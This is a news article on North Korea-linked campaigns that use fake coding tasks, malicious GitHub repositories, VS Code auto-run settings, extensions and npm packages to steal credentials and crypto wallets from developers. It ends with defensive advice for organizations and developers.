North Korean Hackers Weaponize Developer Tools to Turn Code Workflows Into Malware Delivery Channels

Cybercriminal groups are shifting from traditional phishing to developer-focused attacks, using GitHub, VS Code projects, and fake coding tasks to compromise organizations worldwide.

Cyber attackers are increasingly targeting the tools developers trust. A recent wave of campaigns linked to North Korea-aligned threat actors shows how software development environments can become powerful malware delivery channels.

Security researchers identified malicious campaigns connected to the threat cluster known as Contagious Interview, also tracked under names including Famous Chollima, HexagonalRodent, and Void Dokkaebi. The campaigns focus on developers through fake recruitment messages, code review requests, and technical assignments designed to appear legitimate.

The attack begins with carefully crafted phishing emails that direct victims to attacker-controlled GitHub repositories. These repositories often contain fake coding projects or cryptocurrency-related tasks. When developers clone the repository and open it in tools such as Microsoft Visual Studio Code or Cursor, hidden automation features trigger malicious code execution.

One major technique involves VS Code project settings that automatically run commands when a folder opens. This allows attackers to execute malware without requiring users to manually launch suspicious files.

The campaigns, tracked as UNK_DeadDrop, targeted organizations across finance, cryptocurrency, education, and technology sectors. Researchers observed hundreds of phishing emails sent to employees at nearly 100 organizations, with a significant number of targets located in the United States and other major technology markets.

Additionally, attackers have expanded their methods beyond traditional malware delivery. They are now abusing developer ecosystems, open-source repositories, package managers, and code collaboration platforms to reach technical users.

The malware used in these attacks can operate across Windows, macOS, and Linux environments. Once installed, it can steal browser credentials, cryptocurrency wallet information, sensitive files, and authentication data. Attackers also use these tools for system discovery and remote command execution.

A key concern is the targeting of cryptocurrency developers and financial technology professionals. Developer machines often contain valuable assets, including API keys, cloud credentials, private repositories, and wallet access information. Therefore, compromising one developer can create risks beyond a single endpoint.

Researchers also discovered malicious VS Code extensions disguised as productivity tools. These extensions used trusted developer platforms as a disguise while providing attackers with capabilities for data theft, command execution, and remote access.

Meanwhile, other campaigns have used malicious npm packages and GitHub repositories to spread information stealers and remote access tools. This demonstrates a broader trend: attackers are treating software supply chains and developer workflows as direct attack surfaces.

For security leaders and CISOs, this evolution highlights the need to expand protection beyond traditional endpoint security. Organizations must also secure developer environments, monitor software supply chain risks, and establish controls around third-party code usage.

Developers should verify repositories before cloning projects, avoid executing unknown code, review project configuration files, and use security tools that detect suspicious extensions and automation behavior.

The future of cybersecurity will require protecting not only users and applications but also the entire development lifecycle. As attackers continue adapting, secure coding practices and developer awareness will become critical defenses against modern cyber threats.